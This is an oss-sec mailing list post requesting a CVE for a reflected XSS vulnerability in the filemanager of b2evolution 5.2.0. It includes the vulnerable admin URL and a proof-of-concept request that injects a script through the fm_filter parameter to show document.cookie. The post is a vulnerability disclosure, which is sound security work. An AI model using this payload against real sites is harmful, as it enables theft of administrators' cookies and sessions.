oss-sec mailing list archives

CVE-Request -- CMS b2evolution v.5.2.0 -- Reflecting XSS vulnerability in filemanager functionality

From: Steffen Rösemann <steffen.roesemann1986 () gmail com>
Date: Tue, 13 Jan 2015 19:02:53 +0100

Hi Josh, Steve, vendors, list.

I found a reflecting XSS vulnerability in CMS b2evolution v.5.2.0
(release-date: 30th Dec 2014). It is located in its filemanager
functionality, which can be accessed in the administrative backend by the
following URL (assuming a common b2evolution installation):

http://
{TARGET}/blogs/admin.php?fm_filter=&actionArray[filter]=Apply&ctrl=files&locale=&blog=1&mode=&ajax_request=0&root=collection_1&path=&fm_mode=&linkctrl=&linkdata=&iframe_name=&fm_hide_dirtree=0&fm_flatmode=&fm_order=&fm_orderasc=

The "fm_filter" parameter is vulnerable to XSS attacks and can be exploited
by an attacker like in the following example:

http://
{TARGET}/blogs/admin.php?fm_filter=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&actionArray[filter]=Apply&ctrl=files&locale=&blog=1&mode=&ajax_request=0&root=collection_1&path=&fm_mode=&linkctrl=&linkdata=&iframe_name=&fm_hide_dirtree=0&fm_flatmode=&fm_order=&fm_orderasc=

Could you please assign a CVE-ID for it?

Thank you very much!

Greetings.

Steffen Rösemann

References:

[1] http://b2evolution.net/
[2] http://sroesemann.blogspot.de/2014/12/sroeadv-2014-09.html
[3]
http://sroesemann.blogspot.de/2015/01/report-for-advisory-sroeadv-2014-09.html

Current thread:

CVE-Request -- CMS b2evolution v.5.2.0 -- Reflecting XSS vulnerability in filemanager functionality Steffen Rösemann (Jan 13)
- Re: CVE-Request -- CMS b2evolution v.5.2.0 -- Reflecting XSS vulnerability in filemanager functionality Henri Salo (Jan 14)
  - Re: CVE-Request -- CMS b2evolution v.5.2.0 -- Reflecting XSS vulnerability in filemanager functionality Daniel Kahn Gillmor (Jan 15)
    - Re: CVE-Request -- CMS b2evolution v.5.2.0 -- Reflecting XSS vulnerability in filemanager functionality Hanno Böck (Jan 15)
    - Re: CVE-Request -- CMS b2evolution v.5.2.0 -- Reflecting XSS vulnerability in filemanager functionality Henri Salo (Jan 16)
- Re: CVE-Request -- CMS b2evolution v.5.2.0 -- Reflecting XSS vulnerability in filemanager functionality cve-assign (Feb 12)